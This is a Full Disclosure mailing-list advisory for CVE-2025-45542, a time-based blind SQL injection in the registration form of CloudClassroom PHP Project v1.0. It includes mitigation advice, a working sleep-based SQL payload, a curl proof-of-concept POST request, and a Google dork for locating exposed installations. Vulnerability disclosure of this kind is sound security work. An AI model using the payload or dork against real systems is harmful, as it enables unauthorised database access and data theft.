[FD] CVE-2025-45542: Time-Based Blind SQL Injection in CloudClassroom PHP Project v1.0

Tue, 03 Jun 2025 07:02:23 -0700 

Hello Full Disclosure list,

I am sharing details of a newly assigned CVE affecting an open-source
educational software project:

------------------------------------------------------------------------
CVE-2025-45542: Time-Based Blind SQL Injection in CloudClassroom PHP
Project v1.0
------------------------------------------------------------------------

Product: CloudClassroom PHP Project
Vendor: https://github.com/mathurvishal/CloudClassroom-PHP-Project
Affected Version: v1.0
Vulnerability Type: SQL Injection
Attack Type: Remote
CVE ID: CVE-2025-45542
Discoverer: Sanjay Singh

Vulnerability Details:
A time-based blind SQL injection vulnerability exists in the
`registrationform` endpoint of CloudClassroom-PHP-Project v1.0. The `pass`
parameter is not properly sanitized, allowing an unauthenticated remote
attacker to manipulate backend SQL logic and potentially extract sensitive
information.

Proof of Concept:
The vulnerability can be exploited using a POST request with a crafted
payload like:
`'XOR(if(now()=sysdate(),sleep(6),0))XOR'`

Impact:
Successful exploitation allows for:
- Arbitrary SQL execution
- Potential information disclosure
- Authentication bypass under certain conditions

Recommended Mitigations:
- Use prepared statements with parameterized queries
- Sanitize input with `mysqli_real_escape_string()` or similar
- Implement a Web Application Firewall (WAF)
- Enforce least privilege on the application’s DB user

References:
- GitHub: https://github.com/mathurvishal/CloudClassroom-PHP-Project
- Exploit-DB Submission (pending approval)
- GHDB Dork (submitted): `inurl:"CloudClassroom-PHP-Project-master"
intitle:"Cloud Classroom"`

I have also submitted this to Exploit-DB and the Google Hacking Database to
assist defenders and researchers.

Attached is a detailed advisory in plain text format.

Regards,
Sanjay Singh
https://www.linkedin.com/in/sanjay70023

https://gist.github.com/sanjay70023/63e9c32e49a0760eaa6b9e2a8ba8c966

# Exploit Title: CloudClassroom PHP Project v1.0 - Time-Based Blind SQL 
Injection (pass parameter)
# Google Dork: inurl:CloudClassroom-PHP-Project-master
# Date: 2025-05-30
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://github.com/mathurvishal/CloudClassroom-PHP-Project
# Software Link: 
https://github.com/mathurvishal/CloudClassroom-PHP-Project/archive/refs/heads/master.zip
# Version: 1.0
# Tested on: XAMPP on Windows 10 / Ubuntu 22.04
# CVE : CVE-2025-45542

# Description:
# A time-based blind SQL injection vulnerability exists in the pass parameter 
# of the registrationform endpoint. An attacker can exploit this issue by 
sending 
# a malicious POST request to delay server response and infer data.

# PoC Request (simulated using curl):

curl -X POST 
http://localhost/CloudClassroom-PHP-Project-master/registrationform \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d 
"addrs=3137%20Laguna%20Street&course=1&dob=1967/1/1&email=test...@example.com&faname=test&fname=test&gender=Female&lname=test&pass=u]H[ww6KrA9F.x-F0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z&phno=94102&sub="

# The server response will be delayed if the SQL condition is true, confirming 
the injection point.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Reply via email to